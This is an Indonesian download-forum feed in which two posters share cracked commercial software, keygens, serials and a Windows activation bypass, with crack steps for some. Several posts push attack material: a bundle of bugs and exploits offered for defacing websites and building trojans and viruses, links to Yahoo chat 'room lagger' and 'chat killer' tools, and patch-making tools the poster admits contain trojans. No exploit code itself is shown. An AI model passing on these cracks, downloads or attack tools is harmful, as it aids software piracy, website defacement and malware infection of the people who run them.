Quote: NOD32 Antivirus Sistem seimbang memberikan perlindungan terhadap ancaman membahayakan PC Brada. Virus, worm, dan malware lainnya disimpan dari jarak dari data berharga Brada. ESET NOD32 Antivirus versi 3 antivirus dan antispyware menyediakan perlindungan untuk semua rumah / kantor PC berjalan Microsoft Jendela 2003 / XP atau Vista. (Server versi yang tersedia.) ESET NOD32 Antivirus versi 3 juga memiliki fitur grafis antarmuka yang disempurnakan, dengan on-demand membantu dan mudah ... more »

Cara Membuat Email dengan Nama Domain yang Unik. Gratis…xixii!!!!

timhacker318 at Your first forum - 2 minggu yang lalu
Quote:Email merupakan salah satu bagian yang tak terpisahkan dari internet. Memiliki email adalah suatu keharusan bagi kita yang suka berkecimpung di dunia maya ini,baik untuk sekedar membuat account facebook,twitter atau yang lainnya. Pada umumnya orang membuat email di Yahoo ataupun Gmail, tetapi tahukah brada jika kita juga bisa membuat nama email dengan domain yang unik. misalnya seperti yang baru saja saya buat yaitu fistaalghifary@muslim.com . kalo diliat,apakah domain @muslim.com merupakan ... more »

Download Billing Express v5.0.5 R11 With Crack | 6 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Sebelum Shalat Maghrib share dulu ach xixii!! Aplikasi yang berguna buat Brada yang sedang atau mau membuka usaha Internet Cafe atau Warnet. Billing Express v5.0.5 R11 merupakan aplikasi untuk memonitor pembayaran setiap client/user yang sedang berjalan. Aplikasi ini juga sama halnya dengan aplikasi yang bernama Billing Explorer DeskPro8 Vista7 F.12 yang telah fary share beberapa bulan yang lalu. Konon katanya Billing Express v5.0.5 R11 yah meskipun bukan versi baru tidak sesulit ...more »

Download 2011 : Quran In Word | 2.6 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Quran in Word adalah suatu plugins Al-Quran pada aplikasi microsoft word, buat yang kesulitan dalam menuliskan penggunaan huruf arab untuk menuliskan ayat-ayat mungkin aplikasi ini cocok buat brada yang biasanya sendang mencari inspirasi untuk dijadikan sebuah teks ceramah/dakwah atau tugas dari sekolah mudah dan efisien. Remove bug : * Only running first instance of window * Only running in administrator privilage New Feature : * Support translation more ... more »

Download Kumpulan Game RIP FULL : Winning Eleven 2002 With pSX emulates| 10 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Game Winning Eleven 2002, merupakan game jadul tapi seru xixii!! kalau kemarin fary share yang terbaru nah karena ada permintaan dari member lupa namanya yah apa salahnya brada bernostalgia dengan game PS1 ini xiixi!!. Ukurannya kalau sudah di exstrak kurang lebih 300 Mb nah biar tidak bingung ikuti langkah berikut ini, ada brada di bawah aaaaww Cara Bermain : 1. Ekstrak dengan pilihan *Exctract Here* kalau memilih yang lain eror xixi.. 2. Ekstrak kembali ke dua rar pSX ... more »

Download Software Lockhunter 2011 ( Menghapus File yang di blokir ) | 3.6 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Download Software Lockhunter 2011 ( Menghapus File yang di blokir) | 3.6 Mb LockHunter adalah software untuk menghapus file yang diblokir oleh seseorang yang Brada tidak kenal/tahu. LockHunter berguna untuk berperang melawan malware, dan program lain yang menghalangi file tanpa alasan.jika Brada menghapus file blokiran menggunakan LockHunter maka file akan di pindahkan ke recyle Bin supaya Brada dapat me-Restore kembali . LockHunter ini memiliki tampilan yang dapat dipahami semua ... more »

Download OS Seven Cyber Extrime 2012 With Source Code VB6 | 800 Kb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Source Code Seven Cyber Extrime 2012 OS ______________________________ Bagi brada yang suka ngedit Source Code, silahkan fary mempunyai Source Code husus untuk VB6 yaitu Seven Cyber Extrime 2012. Brada bisa menambahkan di sample SC ini silahkan sekehendak hati brada xixixi!! asal brada senang saja wew!!. Yang mana Seven Cyber Extrime 2012 telah di rancang bisa buka explorer, wmp, jam dan sebagainya. Jika ada kekurangan karena ini sebenarnya projek jaman dulu saat ...more »

Download 2011 Windows Loader V2.6 | 1.3 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Seperti yang Kita ketahui, bahwa kegunaan dari Windows Loader v2.0.6 Terbaru 2011 ini sangatlah dibutuhkan oleh para pengguna Windows Bajakan, terutama Windows 7. hehe. ^_^ Nah, dengan Windows Loader v2.0.6 Terbaru 2011 ini kita bisa menghilangkan WAT (Windows Activation Technologies) yang ada di Windows yang kita gunakan jika terdeteksi sebagai Windows palsu, dan Windows Loader v2.0.6 Terbaru 2011 ini juga akan memasukan Sertifikat Genuine kedalam System Windows kita. Screenshot ... more »

Download Software Easy File Locker 2011 | 274 Kb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Easy File Locker adalah software yang mudah digunakan.Sebuah produk perangkat lunak keamanan yang dapat melindungi file dan folder pribadi. Dengan perlindungan yang besar, orang lain tidak akan dapat membuka, membaca, memodifikasi, menghapus, memindahkan, menyalin file yang terkunci / folder, atau bahkan tidak dapat melihatnya. Tersembunyi file / folder akan benar-benar terlihat bagi semua pengguna dan untuk setiap program. Fitur: * Lock file, Lock folder: Mengunci file / ... more »

Download Kumpulan Mini Game Full : NagiQ 2011 | 27 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Game nagiq ini game mini full seru banget deh kalau brada mainin game ini, seru ada mystik leternya gitu total levelnya kurang lebih ada 125 ich seru deh pa gy kalau buat anak yang masih belajar hehhehe,,,, penasaran yah download sajah tinggal di setup jah. Screenshot : Password If Need : timhacker318 Silahkan di download yah ^_^ : Download Kumpulan Mini Game Full : NagiQ 2011 | 27 Mb[quote]

Download Kumpulan Mini Game : Penguin Vs Yety | 10 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Description Awesome snowboard racing game! Challenge giant yetis with your penguin! Game features: Tons of unique levels Many game trophies Great sound Uttermost arcade experience game lumayan seru boleh brada coba. Screenshot : Password If Need : timhacker318 Silahkan Brada Download : Download Kumpulan Mini Game : Penguin Vs Yety | 10 Mb

Download Mini Software Compress game Rip ekstensi .bin Work | 14 Kb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Cosi Compression adalah salah satu software mini yang ukuranya hanya k14 kb tapi software ini mampu mengkonpress file .bin game atau software yang di ripping. Jika brada download game lalu di dalam nya hanya ada file berekstensi .bin tidak salah lagi brada coba pakai software Cosi Compression ini, hasilnya 100 % Work dan sangat membantu. Cara nya : 1. Ekstrak Softwarenya 2. Cari file game ekstensi .bin 3. Klik Decompres Tunggu Sampai selesai nanti ukuran file game akan besar 4. ...more »

Download Aplikasi Penyingkat kalimat Status facebook v.1.2 Plus Source Code VB6 | 400 Kb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Aplikasi Penyingkat kalimat facebook v.1.2 ini bagus deh buat brada yNg gi belajar VB6 Lucu buatnya pa lagi kalau brada menulis kalimat yang panjang atau pendek , cocok buat status facebook atau kirim sms biar gak salah menyingkat kata-katanya heheheh,,,,, ^_^ contoh : Aku Sayang kamu nanti akan jadi = Aq Syng Km bisa menulis banyak atau sedikitpun gak papah asalkan jangan kalimat yang kita tulis menggunakan hurup besar semua. aplikasinya gampang ko tambahin pa jah sesuai ...more »

Download Kumpulan Skin XP : Seven Remix XP 2.41 Black Edition 2011 | 21 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Kalau Dak salah Sih ini buat ganti skin xp biar mirip windows 7 Black edition, belom tahu gimana bentuknya tapi katanya bagus mirip ma aslinya. Tapi suka eror di windows xp sp2 buat yang mau coba silahkan jah,, Seven Remix XP 2.41 Black Edition | 21 Mb Based on Original XP Seven Remix, This version is released because of the large tube reception in its first version. What is New : * New: Seven Remix XP Black Edition * Fixed: installer error Server 2003 R2 Screenshot ... more »

Download Software Portable : BitRock InstallBuilder Enterprise v7.0.5 | 115 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Quickly create cross platform installers. BitRock InstallBuilder turns application packaging and deployment into a fast, easy and cost effective process for developers. The development tool allows you to quickly create easy to use, multiplatform installers that have a native look and feel across Windows, Linux, Mac OS X, HP UX, AIX, FreeBSD, IRIX and Solaris from a single build environment. Multiple installation modes allow installers to be run in servers, workstations, and desktops. ... more »

Download Software : Membuat Rangkaian Elektronika Dengan CadSoft Eagle professional 2011 With Crack | 44 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: CadSoft Eagle professional 2011, merupakan Software yang dapat membantu brada untuk membuat rangkaian elektronika, ini sangat berguna bagi brada yang hobby elektronika. Karena software dengan ukuran kecil ini memiliki kemampuan untuk membuat design skema rangkaian elektronika dengan cepat dan mudah, termasuk di dalamnya papan sirkuit rangkaian elektornika. Gambar rangkaian elektronika yang anda hasilkan bisa anda ekspor ke beberapa format grafis seperti PDF, EPS, LaTeX PGF, SVG, PNG, ... more »

Download Software : Copy CD/DVD Tergores atau Rusak Dengan AnyReader 8.3 With Key | 3 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: AnyReader 3.8, Merupakan software yang mirip CD Recovery Toolbox namun software ini lebih bagus kecepatan copynya dan jika CD atau DVD Tergores, rusak tidak dapat dibaca oleh media lain atau pembaca CD/DVD yang ada! AnyReader adalah perangkat lunak atau software untuk membaca media: CD, DVD, LAN Drives, memori flash, ZIP disk, disket, dll AnyReader efektif eksemplar dan menyimpan data korup dari semua jenis disk atau koneksi yang salah di mana menyalin standar metode gagal dalam membacanya. ... more »

Download Software Power Data Recovery 2011 Full With Serial | 1.6 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Power Data Recovery is a powerful data recovery software developed by MT Solution Ltd. Since the first release of version 1.0 in 2003 we have had many happy customers around the world. It is one of the fastest and most effective programs of the data recovery software. Power Data Recovery is becoming the first choice when you need data recovery software to help you recover your lost data. Power Data Recovery is a read-only File Recovery Software and Data Recovery Software. Power data ... more »

Download Software 2011 Client for Google Translate Pro v5.2.603 With Patch | 2.6 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Free Google Translate Client Pro adalah aplikasi penerjemah online untuk Windows yang memungkinkan Brada untuk menterjemahan text dengan cepat pada beberapa aplikasi seperti Outlook, MS Word, Internet Explorer, dan Firefox. Screenshot : Dengan “Google Translate Client Pro Full Version Terbaru” sekarang Brada dapat menerjemahkan halaman web, surat elektronik dan dokumen lainnya tanpa harus membuka situs terjemahan online. Silahkan Brada Download : Download Client for ... more »

Download Software Error Repair Professional v4.2.3 With Serial | 1.2 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Error Repair Professional v4.2.3 - Merupakan sebuah software yang berfungsi untuk menjaga performa komputer Brada agar tetap tetap terjaga dengan baik. dan akan secara otomatis melakukan scan, identifikasi, memperbaiki error yang terjadi pada komputer hanya dengan satu kali klik. akan menghilangkan segala error yang ada di komputer Brada dengan mudah dan hanya dengan beberapa klik saja. Error Repair Professional v4.2.3 akan melakukan scan pada registry dan mencari kesalah entry serta ... more »

Mengembalikan Data Terhapus Dengan : WinMend Data Recovery v1.4.1.0 With Keygen | 2.3 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: WinMend Data Recovery v1.4.1.0 merupakan software yang bisa Brada gunakan untuk mengatasi masalah data yang terhapus karena sengaja atau tidak sengaja baik data yang ada di Kompi, Laptop, Netbook, MMc Handphone, WinMend Data Recovery v1.4.1.0 mendukung beberapa Format seperti FAT12/ FAT16/FAT32/NTFS/NTFS5 yang ada pada Sistem Windows yang kita gunakan. Software kecil tapi handal dalam pemakaian ^_^ WinMend Data Recovery v1.4.1.0 juga support untuk : Windows 98/ME/2000/XP/Vista/ ... more »

Download Kumpulan Game PC FULL RIP : Game Buttle Mobile Weapon | 110 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Description Really Big Sky is a proper, red-blooded, co-op enabled, mind melting, eye bursting, arcade inspired space shoot ‘em up! Play with up to 3 buddies as you blast your way through the universe leaving nothing but destruction in your wake as you plough through waves of bad aliens! Be the Hero Can you save [your planet] from utter annihilation? Of course you possibly could, especially when you’re armed to the teeth with gloriously overpowered weaponry! They’ve given you ... more »

Download Kumpulan Game PC FULL RIP : Initial D Mountain Vengeance | 167 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Description The drift racing action of Initial D comes to the PC with multiple mountain roads and a choice of eight different cars. Drive to survive as you drift through treacherous mountain curves immersed in the world of INITIAL D�. Battle over glory, passion, pain and revenge against tough street racing teams. Pick your team, ignite your engine and defend your turf. Screenshot : Password If Need : timhacker318 Silahkan Di Download ^_^ : Download Game Initial ... more »

Download Kumpulan Game PC FULL RIP : Game Buttle Mobile Weapon | 23 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Description The game is turn-based role-playing game (like Final Fantasy series) is quite familiar. So the game's battle system is also quite close: every encounter with the enemy (placed randomly in the game screen), you will be moved to a new map, where you and your opponent will turn test development fry another attack. In addition, Mobile Weapon also has the improvements, much like the later version of the Final Fantasy: Each of your character, HP common outside bar will be ... more »

Download 2011 Hard Disk Sentinel Professional v3.70 With Key | 12 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Hard Disk Sentinel Professional v3.70, merupakan salah satu software yang dapat brada gunakan untuk memantau kondisi serta performar Hardisk yang brada pakai. Software asal Itali ini memang cukup terkenal, karena Hard Disk Sentinel Professional v3.70 memiliki banyak Fitur yang tidak dimiliki oleh kebanyakan software lainnya. Tampilan serta Fungsi dan kegunaan yang User Friendly menjadi salah satu kelebihan dari software ini. Silahkan di download ^_^ Download 2011 Hard Disk Sentinel ... more »

Download 2011 WinUtilities Professional 10.34 With Keygen | 6 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: WinUtilities Professional 10.34 memiliki keunggulan tersendiri dibandingkan Software Utilities lainnya. WinUtilities Professional 10.34 merupakan software yang bisa sobat gunakan untuk membersihkan File sampah, Cookies, Cache, Hardisk atau Registry Defrag dan Cleaner, Uninstaller dan masih banyak lagi Fitur yang terdapat pada WinUtilities Professional 10.34 ini. Silahkan yah di download : Download 2011 WinUtilities Professional 10.34 With Keygen | 6 Mb

Download : Game PC final fantasy VIII

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Final Fantasy VIII (ファイナルファンタジーVIII, Fainaru Fantajī Eito?) adalah sebuah permainan role-playing game yang diciptakan oleh Square Co., Ltd. untuk Sony PlayStation dan PC berbasis Microsoft Windows. Game ini merupakan judul kedelapan dalam seri utama permainan Final Fantasy dan judul kedua yang dirilis untuk PlayStation dan Windows. Cerita terfokus pada sekelompok tentara bayaran yang terjebak dalam suatu konflik internasional yang dirancang oleh seorang penyihir bernama Edea, dan berusaha ... more »

Tips 2011 : Mempercepat Mozilla Firefox dengan SpeedyFox | 440 Kb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Mozilla Firefox merupakan salah satu peramban yang banyak diminati pengguna internet. Sayangnya, salah satu kelemahan firefox adalah lambatnya waktu muat (loading), diakibatkan besarnya konsumsi memori saat firefox tersebut dijalankan. Lambannya kecepatan firefox disebabkan karena pada dasarnya engine Firefox menggunakan database SQLITE untuk menyimpan banyak settingan. Dengan lamanya waktu penggunaan, serta banyaknya history, bookmark, dan settingan lain, maka ukuran database SQLITE ... more »

Download Download 2011 SpeedUp MyPC 2011 v5113 With Serial | 5 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: SpeedUpMyPC 2011 - Sebuah program untuk mengembalikan kemampuan komputer seperti layaknya komputer atau notebook baru dengan system yang masih fresh. SpeedUpMyPC 2011 Full Version akan memindai komputer untuk mengidentifikasi proses, file dan pengaturan yang memperlambat komputer, dan segera mengoptimalkan sistem untuk meningkatkan kinerja komputer. Dengan beberapa klik mouse, Program ini akan mengerjakan tugasnya untuk sobat. RAM dan fungsi CPU semua di scan, dibersihkan dan disetel ... more »

Download Kumpulan Software Portable : Corel Paint Shop Pro X4 v14.0.0.332 | 214 Mb

timhacker318 at Your first forum - 2 minggu yang lalu
Quote: Aduh Baru posting lagih xixixi!! Pada kesempatan ini Fary akan sedikit share software portable ini telah tested fary coba dan hasilnya sangat bagus. Silahkan baca lebih lengkapnya xixii!! Here is updated version of Corel PaintShop Photo Pro X4 by CORE group. Description: PaintShop Photo Pro X3 is the most rewarding way to enhance your photos and create professional-looking images. Now with a complete RAW workflow, this photo-editing software lets you manage, adjust, ... more »

Download 2011 Internet Download Manager v6.07 build 11+ KeyMaker Life Time + IDM Optimizer | 5 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: New : Internet Download Manager v6.07 build 11. Fixed compatibility problems with different browsers including Internet Explorer 10 Final, Mozilla Firefox 4 and Mozilla Firefox 5 dan 6, Google Chrome. Improved FLV grabber to save videos from web players on YouTube, WOW! Google Video, MySpace TV, and other popular sites Cara Kerja Crack IDM Life Time : 1. Disconnect dari Internet 2. Jalankan KeyPatch 3. Pilih "Clear Previous registration data"" 4. Pilih "Patch Server Check" ... more »

Tips : Mempercepat koneksi internet smart modem dengan ISP super cepat With Software | 1 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Pakai Modem Smart yahh,,, Coba tips ini yuk!! Baca Caranya di bawah ini : 1. Dari the “Start” menu, pilih “Control Panel” atau “Start” – “Settings” - “Control Panel”. 2. Click the “Switch to Classic View” icon 3. Double-click the “Network Connections” icon. Click the “Create a new connection” icon. 5. kemudian akan muncul sebuah layar, click “Next” 6. pilih opsi “Connect to the Internet”, and click “Next”. 7. pilih “Set up my connection manually”, click “Next” 8. ... more »

Download 2011 Net Tools 5 All In One Full ( Software LAN Warnet ) | 25 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Net Tools 5, merupakan sebuah software monitor jaringan komputer lokal LAN yang sangat lengkap menurut saya.Berbagai fitur pengolah jaringan sudah disematkan untuk mempermudah pengolahan / monitoring jaringan. Net Tools juga bisa dibilang merupakan sebuah hacking tools karena fiturnya mencakup fitur yang bisa melakukan hacking. Screenshot : [/center] fitur Net Tools 5: * IP Address Scanner; * IP Calculator; * IP Converter; * Port Listener; * Port Scanner; * Ping; * ... more »

Download 2011 MakBit Virtual CD/DVD 1.9.5 With Keymaker | 2 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: MakBit Virtual CD-DVD 1.9.5 adalah sebuah software kecil banget yang mungkin berguna bagi brada yang menginginkan Virtual Disk yang bisa digunakan untuk Instalasi File berformat .ISO / .UDF / .IMG dan Lain-lain. Seperti halnya Daemon Tools dan Power ISO, MakBit Virtual CD-DVD 1.9.5 ini dirancang se-simple dan seringan mungkin untuk digunakan, dan cara pemakaiannya pun tidaklah rumit, brada hanya cukup memilih File berformat yang ingin dijadikan Virtual Disk lalu jadilah Virtual Disk-nya. Jika ... more »

Download 2011 Belajar Al-Quran Buat Anak Dengan Qronis ( Iqro Animasi ) | 4.8 Mb

Bunga Najwa at Your first forum - 2 minggu yang lalu
Quote: Qronis adalah sebuah metode pembelajaran membaca Al Qur'an baru dengan pendekatan Iqro Animasi, sehingga proses belajar menjadi lebih menarik karena memiliki tampilan yang menarik untuk anak-anak. Software ini sangat cocok sekali bagi brada yang punya anak atau adik yang masih kecil dan yang lagi belajar Al-Quran dengan vitur yang imut dan lucu penuh animasi sehingga anak kita akan Cepat mempelajari Al-Quran dan jika sudah lancar bisa langsung pindah ke Al-Quran yang 30 Juz. Software ... more »

smscaster 3.7 with keygen_urduvb.com.rar| 2 Mb

timhacker318 at Your first forum - 3 minggu yang lalu
Quote:ou are here > Home > Internet > Phone Tools > SMSCaster E-Marketer CDMA 3.7.0.1397 free SMSCaster E-Marketer GSM Standard 3.7.0.1397. SMS marketing software: Send bulk SMS with

Download Cheat Game Plants VS Zombies – Matahari tak terbatas | 5 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: Saat Bermain game Plants Versus Zombies kak fary datang lalu dia melihat aku sedang main game katanya Bunga kamu pingin mataharinya keluar terus tanpa batas pakai cheat engin sajah, lanjut cerita ka fary membuatkan cara-caranya. Dan hasilnya 100 % akurat. Nah jika teman pingin matahari dari game ini unlimited atau tidak terbatas silahkan ikuti caranya di bawah ini : 1. Buka Game Plants VS Zombies di komputer kamu. mainkan gamenya. Biarkan jumlah matahari tetap 50. Lalu Buka Cheat ... more »

Download PDF Password Remover 2011 With Patch | 2 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: PDF Password Remover 2011 merupakan software yang sangat membantu brada jika file pdf brada ada password nya dengan PDF Password Remover 2011 pdf brada akan di scan dan langsung di hilangkan passwordnya hampir 100 % software ini dapat menghapus password semua pdf. Screenshot : Semoga bermanfaat dan membantu. Cara Aktivasi : 1. Install PDF Password Remover.exe 2. Buka PATCH.EXE 3. kemudian klik patch, mencari "winDecrypt.exe" 4. Selesai Semoga bermanfaat Silahkan ... more »

Download 2011 Kumpulan Bug dan Exploit Terbaru | 3 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: Bunga Share beberapa Bug dan Exploit milik ka Fary, yang dapat membantu brada untuk deface situs atau membuat Trojan dan virus. Silahkan saja di pelajari, Bug dan Exploitnya lumayan baru dan komplit jika kompi atau Lepi brada menganggap virus itu di karenakan ada script untuk membuat virus dan Trojan. Silahkan di download : Download 2011 Kumpulan Bug dan Exploit Terbaru | 3 Mb

Download Kumpulan Software Edit Video Portable : Portable 3D Album Commercial Suite v3.29 | 294 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: 3D Album Commercial Suite v3.29 merupakan software yang sangat membantu bagi brada yang suka edit video baik itu yang sudah mahir atau yang baru belajar. sangat cocok di gunakan untuk edit video pernikahan , wisuda , dan kegiatan lainya. Dengan penambahan plugin, theme , efek dan lainya brada akan di manjakan dan tidak akan bosan untuk mengedit video atau photo. Ukuran aplikasi ini besar tapi sudah di portablekan tapi tidak mengurangi semua yang ada didalam software 3D Album ...more »

Download Kumpulan Software Edit Video Portable : Adobe Premiere Pro CS4 v4.2.1 | 165 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: Adobe Premiere Pro CS4 - versi baru dari program profesional untuk video editing nonlinier. Ini memiliki fasilitas modern dan instrumen, memiliki antarmuka yang dapat disesuaikan yang nyaman, alat-alat fungsional untuk mengedit track audio dan video, The Kemungkinan Menerapkan efek yang berbeda dan teknologi filter untuk mempercepat pemrosesan video dan banyak fitur lainnya ... Juga di Premiere Pro adalah integrasi Diimplementasikan ketat dengan produk lain dari perusahaan Adobe ...more »

Download Kumpulan Software Edit Video Portable : SmartSound SonicFire Pro v5.6 | 22 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: SmartSound Sonicfire Pro 5 ignites your creativity like no other music solution in the world. Effortlessly mold music from the largest fully-customizable music library to custom-fit any production. The fusion of patented music editing technology, intuitive design and prolific music production makes Sonicfire Pro 5 and the SmartSound Music Library the most innovative way to add a custom music score to your productions. Experience the creative power of turning the best library ... more »

Download Kumpulan Software Edit Video Portable : Corel Ulead VideoStudio Pro X2 v12.0.98.0 | 164 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: If movie making is your passion, VideoStudio Pro is the video-editing software for you! Easy yet powerful, it offers end-to-end HD support for creating professional-looking videos and slideshows. Make quick edits with handy Wizards that help you automatically capture footage, polish videos and create DVDs. For more video-editing power, use new creative tools, including picture-in-picture and montage effects. Then add sophisticated DVD menus with unique disc menu transitions. Once ... more »

Download Kumpulan Software Edit Video Portable : Ulead VideoStudio Plus 11.5 & Dolby Digital PowerPack | 149 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: Ulead VideoStudio Plus with Dolby Digital PowerPack v11.5 next update of the software package from Corel's to work effectively with video, allows you to quickly record a video in all major formats, to mount a sophisticated video with special effects, add to project music files or audio tracks with audioCD at home conditions. Version of Ulead VideoStudio Plus with Dolby Digital PowerPack v 11.5 supports the latest technologies, including the ability to burn DVDs in the format of HD ... more »

Elitee Script Hack Yahoo dan chat client

timhacker318 at Your first forum - 3 minggu yang lalu
Paghi Cemua xixixi!! biar Speedy fary cuma mau kasih Info Lagih ea Buat Brada eang mau Yuk kita SedOOTt xixixi Special ALL in 4Shared xixixi!! free Cemua Dweh!! Oke ea liat ajah linknya di atas eh...dibawah xixixi!! caranya CTRL+C aawwww xixixi!! url: 4shared.com /file/20785913/86b75537/BlackWidow_Room_Lagger.html?s=1 url: 4shared.com /file/38575827/9be8d0f9/chat_killer_by_yahoo_city_team.html?s=1 url: 4shared.com /file/12240051/b8f750da/Deep_Frezee_Enterprise_by_lukas_17.html?s=1 ... more »

Download 2011 Virtual Piano 3 With Keymaker | 2.5 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: Virtual Piano adalah software yang dapat mensimulasikan lebih dari 600 instrumen Musik , ini dibilang cukup bagus karena Ukuran Software hanya 3 Mb, dan tampilan yang simpel dan mudah untuk Pemula ataupun yang sudah mahir. Cocok deh kalau kita lagi bT atau lagi cari inspirasi memainkan software ini. Software virtual piano ini sangat mudah di gunakan , tidak ribet dan menghasilkan kreasi yang lumayan bagus. Screenshot : Silahkan di download : Download 2011 Virtual Piano ... more »

Download Kumpulan Game PC FULL : Winning Eleven 9 RIP Via IDWS With Patch | 295 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: Winning Eleven 9 adalah Produk Game keluaran KONAMI yang cukup digemari Oleh kalangan Gamers di Indonesia, memang sih sekarang KONAMI telah merilis versi terbaru dari WE9 ini, yakni PES 2012 tapi PES 2012 mempunyai Size yang besar sekali, sehingga mengurungkan Niat para pendownload untuk mencobanya. Game bola yang di sukai cowok ini sudah di rip sehingga kalau brada mendownload akan menghemat waktu, game ini telah tested oleh ka fary 100 % work. How to Install : 1. Khusus ... more »

Download 20011 Gmail Notifier Pro 3.1 With Keymaker | 3 Mb

Bunga Najwa at Your first forum - 3 minggu yang lalu
Quote: Gmail Notifier Pro 3.1 adalh software yang dapat membantu brada yang sibuk dengan kegiatan sehari-hari dan tidak sempat membuka email yang masuk maka dengan software Gmail Notifier Pro 3.1 ini email gmail brada akan terupdate langsung di desktop mudah dan efisien. Masih banyak fitur yang lainya juga ^_^. Cara Aktivasi : 1. Install Gmail Notifier 3.1 2. Jalankan Gmail Notifier - Pilih Bahasa - OK 3. Pilih MENU - Registration - Enter Registration Code 4. Masukkan datanya sebagai ... more »

Download 2011 Internet Download Manager v6.07 build 10+ KeyMaker Life Time + IDM Optimizer | 5 Mb

timhacker318 at Your first forum - 3 minggu yang lalu
Quote: New : Internet Download Manager v6.07 build 10. Fixed compatibility problems with different browsers including Internet Explorer 10 Final, Mozilla Firefox 4 and Mozilla Firefox 5dan 6, Google Chrome. Improved FLV grabber to save videos from web players on YouTube, WOW! Google Video, MySpace TV, and other popular sites Cara Kerja Crack IDM Life Time : 1. Disconnect dari Internet 2. Jalankan KeyPatch 3. Pilih "Clear Previous registration data"" 4. Pilih "Patch Server Check" ... more »

AVG Internet Security 2011 Business Edition 11.20 Build 3152 Final|139.6 MB

timhacker318 at Your first forum - 3 minggu yang lalu
Quote: DOWNLOAD AVG Internet Security 2011 Business Edition 11.20 Build 3152 Final AVG Internet Security 2011 - a set of programs to protect your PC from dangerous objects and network threats. Program blocks viruses, trojans, worms, spyware, and firewall to protect against network attacks. When using AVG Internet Security 2011 you will not have to worry about identity theft, spam and viruses. The program contains a built-in anti-virus module, firewall, detection system, and unsolicited ... more »

Cara menginstall Windows 7 melalui USB Flashdisk

timhacker318 at Your first forum - 3 minggu yang lalu
Quote: Menginstall Windows melalui USB flashdisk ini ternyata banyak keuntungannya dibanding melalui CD atau DVD disk, Kita tidak perlu khawatir akan CD atau DVD yang ngga kebaca sama CD/DVD-ROM, CD atau DVD yang tergores, kadang menyulitkan dalam proses penginstallan windows, sedangkan melalui Flashdisk itu sendiri, hal yang demikian ngga lah perlu terjadi lagi. Saya akan menunjukkan 2 cara ( secara manual dan otomatis ) menginstall windows 7 melalui USB FlashDisk Sebelum kita mulai, ... more »

Tips Script tentang chat facebook ( xixixi )

timhacker318 at Your first forum - 4 minggu yang lalu
Quote: 1. Scrift Cara buat status teman Brada Offline : wah xixixi!! lucu nih brada kalau di coba aaaaaawww saat chating ma tmen brada di FB ,.coba suruh tmen brada itu copy-in code ini di address bar: Code:javascript:statusControl.sendVisibility(false); maka status dia bakal Offline ,.tentu aja ga permanent,.dia kembali Online setelah klik lg icon xixiixixi!1 aawww atau gunain code sbalik nya: Code:javascript:statusControl.sendVisibility(true); Status ... more »

Tips Speed Up Internet by 20 % tanpa Software

timhacker318 at Your first forum - 4 minggu yang lalu
Quote: Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc You can get it back: Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to: Local Computer Policy then Computer Configuration then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth. Double click on Limit Reservable bandwidth. ... more »

Download 2011 Patch Maker ( Kumpulan Software Untuk Membuat Patch) | 9 Mb

Bunga Najwa at Your first forum - 4 minggu yang lalu
Quote: Beberapa Software ini adalah software yang dapat membantu brada dalam pembuatan patch Software secara mudah dan simple, silahkan ja brada coba softwarenya.tapi dalam beberapa software yang mengandung Trojan jadi balik ke brada ja. Semoga dapat membantu yaH,... Daftar Software : RLZR 2011 FAST PATCH 2011 BUDHA PATCH 2011 CODE PUSION 2012 COOL BEAN NFO PATCH PATCH CREATED WIZARD PATCH ON FLY RTD WIN PATCH TOLA PATCING ENGINE DUP 2011 Selamat Berkarya ... more »

Predator Professional Edition 2.3 With Patch (Mengunci komputer dengan USB) | 2 Mb

Bunga Najwa at Your first forum - 4 minggu yang lalu
